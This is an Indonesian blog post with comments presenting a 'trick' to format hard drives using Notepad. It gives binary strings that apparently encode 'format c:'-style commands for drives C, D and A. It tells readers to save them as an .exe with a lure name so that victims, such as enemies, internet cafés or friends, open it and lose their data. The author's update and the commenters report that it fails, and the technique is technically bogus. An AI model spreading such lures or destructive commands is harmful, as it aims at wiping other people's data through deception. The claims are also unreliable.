Home » OS » Windows » Tips dan Trik Format Hardisk dengan Notepad

Tips dan Trik Format Hardisk dengan Notepad

Tips dan Trik Format Hardisk dengan Notepad
Tips dan Trik Format Hardisk dengan Notepad -?Ini trik jadul banget mungkin udah semua orang yang mengerti IT ( Ilmu Teknologi ) mungkin sudah mengerti semua. Mungkin bisa dibilang ini cuma sekedar catetan saja buat saya. Tetapi apabila kalian belum tahu silahkan anda lanjutkan membaca dan pelajari Tips dan trik Format Hardisk dengan Notepad.
Sebenernya ini trik dan tips Format Hardisk dengan Notepad sering digunakan untuk iseng atau merusak data – data kompi atau laptop musuh, warnet, bahkan temen sendiri kalo mau coba pake komputer sendiri aja jadi kalian ga dosa tuh. 😀
Baik langsung aja ga usah banyak omong.

    1. Format Hardisk.

[code=’css’]01001011000111110010010101010101010000011111100000[/code]

    1. Format Drive C

[code=’css’]01100110011011110111001001101101011000010111010000100000011000110011101001011100?0010000000101111010100010010111101011000[/code]

    1. Format Drive D

[code=’css’]01100110011011110111001001101101011000010111010000100000011001000011101001011100?0010000000101111010100010010111101011000[/code]

    1. Format Drive A

[code=’css’]01100110011011110111001001101101011000010111010000100000011000010011101001011100?0010000000101111010100010010111101011000[/code]
Caranya kalian ketik / copay code binary di atas ke notepad yang sudah kalian siapkan. Setelah itu save /simpan dalam bentuk .exe. Contoh sex.exe, atau apalah yang memancing korban supaya membuka file buatan kalian.
NB: Saya tidak bertanggung jawab atas kejadian yang terjadi.
UPDATE : Sudah saya coba. hasilnya ga ada reaksi alias gagal :))

No Comments

  1. iddev

    Agustus 30, 2010 at 10:51 pm28

    Wah, mantap nih..
    dicoba dulu deh

    Reply
    • admin

      Agustus 31, 2010 at 12:49 pm28

      kalo dah coba review-nya ya gan. . .

      Reply
  2. xbacktrack

    Desember 14, 2011 at 4:23 pm28

    wah gagal om, klau bisa manta bangat tuh bos.

    Reply
    • Amri

      Desember 14, 2011 at 5:04 pm28

      Saya juga udah coba gagal.. 😀

      Reply
  3. kelvienz

    September 8, 2013 at 1:29 pm28

    yahh gagal klo bisa seru tuhhh bisa nge ilangin data kom sekolah

    Reply

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *

%d blogger menyukai ini: